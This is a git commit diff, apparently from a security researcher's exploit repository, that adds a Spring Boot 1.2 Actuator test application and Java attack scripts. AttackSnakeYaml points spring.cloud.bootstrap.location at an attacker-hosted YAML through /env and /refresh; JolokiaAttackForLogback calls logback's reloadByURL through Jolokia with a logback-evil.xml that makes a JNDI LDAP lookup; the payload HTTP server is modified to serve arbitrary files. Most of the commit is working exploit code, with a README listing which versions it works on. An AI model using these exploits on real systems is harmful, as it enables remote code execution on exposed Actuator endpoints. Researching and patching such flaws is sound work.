feat:spring-actuator

Author: threedr3am

common/pom.xml

@@ -10,6 +10,7 @@
   <modelVersion>4.0.0</modelVersion>
 
   <artifactId>common</artifactId>
+  <packaging>jar</packaging>
 
   <dependencies>
     <dependency>
@@ -35,12 +36,12 @@
     <dependency>
       <groupId>org.apache.httpcomponents</groupId>
       <artifactId>httpclient</artifactId>
-      <version>4.5.3</version>
+      <version>4.5.11</version>
     </dependency>
     <dependency>
       <groupId>org.apache.httpcomponents</groupId>
       <artifactId>httpmime</artifactId>
-      <version>4.5.3</version>
+      <version>4.5.11</version>
     </dependency>
     <dependency>
       <groupId>org.apache.httpcomponents</groupId>

common/src/main/java/com/threedr3am/bug/common/server/HTTPServer.java

@@ -24,7 +24,9 @@
  */
 public class HTTPServer {
 
-  private static final int PORT = 8080;
+  public static String filePath;
+  public static int PORT = 8080;
+  public static String contentType;
 
   public static void main(String[] args) throws IOException {
     run(args);
@@ -70,7 +72,7 @@ public void handle(HttpExchange he) throws IOException {
               : "?" + he.getRequestURI().getRawQuery()) + " " + he.getProtocol());
       if (requestMethod.equalsIgnoreCase("GET")) {
         Headers responseHeaders = he.getResponseHeaders();
-        responseHeaders.set("Content-Type", "application/json");
+        responseHeaders.set("Content-Type", contentType == null ? "application/json" : contentType);
 
         he.sendResponseHeaders(200, 0);
         // parse request
@@ -94,7 +96,7 @@ public void handle(HttpExchange he) throws IOException {
         }
         System.out.println(stringBuilder.toString());
 
-        byte[] bytes = Files.toByteArray(new File(HTTPServer.class.getClassLoader().getResource(clazz).getPath()));
+        byte[] bytes = Files.toByteArray(new File(filePath == null ? HTTPServer.class.getClassLoader().getResource(clazz).getPath() : filePath));
         // send response
         responseBody.write(bytes);
         responseBody.close();

common/src/main/resources/META-INF/services/javax.script.ScriptEngineFactory

@@ -0,0 +1 @@
+CalcScriptEngineFactory

spring/pom.xml

@@ -10,6 +10,10 @@
   <modelVersion>4.0.0</modelVersion>
 
   <artifactId>spring</artifactId>
+  <packaging>pom</packaging>
+  <modules>
+    <module>spring-boot-actuator-bug</module>
+  </modules>
 
 
 </project>

spring/spring-boot-actuator-bug/README.md

@@ -0,0 +1,11 @@
+### Spring Boot和Spring Cloud版本匹配参考
+
+Spring Boot : Spring Cloud
+- 1.2.x : Angel版本 (snake-yaml、jolokia pass)
+- 1.3.x : Brixton版本 (jolokia pass)
+- 1.4.x : Camden版本 (snake-yaml、jolokia pass)
+- 1.5.x : Dalston版本、Edgware版本 (snake-yaml、jolokia pass) (need to set management.security.enabled=true)
+- 2.0.x : Finchley版本 (hikariCP+h2 pass) (need to set management.security.enabled: true, management.endpoint.restart.enabled: true, management.endpoints.web.exposure.include: env,restart)
+- 2.1.x : Greenwich.SR2
+
+https://mvnrepository.com/artifact/org.springframework.cloud/spring-cloud-dependencies

spring/spring-boot-actuator-bug/actuator-1.2/pom.xml

@@ -0,0 +1,54 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0"
+  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+  xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+  <parent>
+    <groupId>org.springframework.boot</groupId>
+    <artifactId>spring-boot-starter-parent</artifactId>
+    <version>1.2.8.RELEASE</version>
+  </parent>
+  <modelVersion>4.0.0</modelVersion>
+
+  <artifactId>actuator-1.2</artifactId>
+
+  <dependencies>
+    <dependency>
+      <groupId>org.springframework.boot</groupId>
+      <artifactId>spring-boot-starter-web</artifactId>
+    </dependency>
+    <dependency>
+      <groupId>org.springframework.boot</groupId>
+      <artifactId>spring-boot-starter-actuator</artifactId>
+    </dependency>
+
+    <dependency>
+      <groupId>org.jolokia</groupId>
+      <artifactId>jolokia-core</artifactId>
+      <version>1.6.0</version>
+    </dependency>
+
+    <dependency>
+      <artifactId>common</artifactId>
+      <groupId>com.xyh</groupId>
+      <version>1.0-SNAPSHOT</version>
+    </dependency>
+
+    <dependency>
+      <groupId>org.springframework.cloud</groupId>
+      <artifactId>spring-cloud-starter-config</artifactId>
+    </dependency>
+  </dependencies>
+
+  <dependencyManagement>
+    <dependencies>
+      <dependency>
+        <groupId>org.springframework.cloud</groupId>
+        <artifactId>spring-cloud-dependencies</artifactId>
+        <version>Angel.SR6</version>
+        <type>pom</type>
+        <scope>import</scope>
+      </dependency>
+    </dependencies>
+  </dependencyManagement>
+
+</project>

spring/spring-boot-actuator-bug/actuator-1.2/src/main/java/com/threedr3am/bug/spring/actuator/Application.java

@@ -0,0 +1,15 @@
+package com.threedr3am.bug.spring.actuator;
+
+import org.springframework.boot.SpringApplication;
+import org.springframework.boot.autoconfigure.SpringBootApplication;
+
+/**
+ * @author threedr3am
+ */
+@SpringBootApplication
+public class Application {
+
+  public static void main(String[] args) {
+    SpringApplication.run(Application.class, args);
+  }
+}

spring/spring-boot-actuator-bug/actuator-1.2/src/main/java/com/threedr3am/bug/spring/actuator/AttackSnakeYaml.java

@@ -0,0 +1,65 @@
+package com.threedr3am.bug.spring.actuator;
+
+import java.io.UnsupportedEncodingException;
+import org.apache.http.HttpEntity;
+import org.apache.http.client.methods.CloseableHttpResponse;
+import org.apache.http.client.methods.HttpPost;
+import org.apache.http.entity.StringEntity;
+import org.apache.http.impl.client.CloseableHttpClient;
+import org.apache.http.impl.client.HttpClientBuilder;
+import org.apache.http.impl.client.HttpClients;
+
+/**
+ * copy snake-yaml-evil.yml to http server root（but this springcloud version attack fail）
+ *
+ * @author threedr3am
+ */
+public class AttackSnakeYaml {
+
+  public static void main(String[] args) throws UnsupportedEncodingException {
+    String payload = "spring.cloud.bootstrap.location=http://127.0.0.1:80/snake-yaml-evil.yml";
+    String target = "http://localhost:8080";
+
+    HttpPost httpPost = new HttpPost(target + "/env");
+    HttpEntity httpEntity = new StringEntity(payload, "application/x-www-form-urlencoded", "utf-8");
+    httpPost.setEntity(httpEntity);
+    try {
+      HttpClientBuilder httpClientBuilder = HttpClients
+          .custom()
+          .disableRedirectHandling()
+          .disableCookieManagement()
+          ;
+      CloseableHttpClient httpClient = null;
+      CloseableHttpResponse response = null;
+      try {
+        httpClient = httpClientBuilder.build();
+        response = httpClient.execute(httpPost);
+      } finally {
+        response.close();
+        httpClient.close();
+      }
+    } catch (Exception e) {
+      e.printStackTrace();
+    }
+
+    httpPost = new HttpPost(target + "/refresh");
+    try {
+      HttpClientBuilder httpClientBuilder = HttpClients
+          .custom()
+          .disableRedirectHandling()
+          .disableCookieManagement()
+          ;
+      CloseableHttpClient httpClient = null;
+      CloseableHttpResponse response = null;
+      try {
+        httpClient = httpClientBuilder.build();
+        response = httpClient.execute(httpPost);
+      } finally {
+        response.close();
+        httpClient.close();
+      }
+    } catch (Exception e) {
+      e.printStackTrace();
+    }
+  }
+}

spring/spring-boot-actuator-bug/actuator-1.2/src/main/java/com/threedr3am/bug/spring/actuator/JolokiaAttackForLogback.java

@@ -0,0 +1,46 @@
+package com.threedr3am.bug.spring.actuator;
+
+import com.threedr3am.bug.common.server.LdapServer;
+import org.apache.http.client.methods.CloseableHttpResponse;
+import org.apache.http.client.methods.HttpGet;
+import org.apache.http.impl.client.CloseableHttpClient;
+import org.apache.http.impl.client.HttpClientBuilder;
+import org.apache.http.impl.client.HttpClients;
+
+/**
+ * copy logback-evil.xml to http server root
+ *
+ * @author threedr3am
+ */
+public class JolokiaAttackForLogback {
+
+  static {
+    LdapServer.run();
+  }
+
+  public static void main(String[] args) {
+    String target = "http://localhost:8080";
+    String evilXML = "http:!/!/127.0.0.1:80!/logback-evil.xml";
+    HttpGet httpGet = new HttpGet(target + "/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/" + evilXML);
+    try {
+      HttpClientBuilder httpClientBuilder = HttpClients
+          .custom()
+          .disableRedirectHandling()
+          .disableCookieManagement()
+          ;
+
+      CloseableHttpClient httpClient = null;
+      CloseableHttpResponse response = null;
+      try {
+        httpClient = httpClientBuilder.build();
+        response = httpClient.execute(httpGet);
+      } finally {
+        response.close();
+        httpClient.close();
+      }
+    } catch (Exception e) {
+      e.printStackTrace();
+    }
+
+  }
+}

spring/spring-boot-actuator-bug/actuator-1.2/src/main/resources/logback-evil.xml

@@ -0,0 +1,3 @@
+<configuration>
+  <insertFromJNDI env-entry-name="ldap://127.0.0.1:43658/Calc" as="appName" />
+</configuration>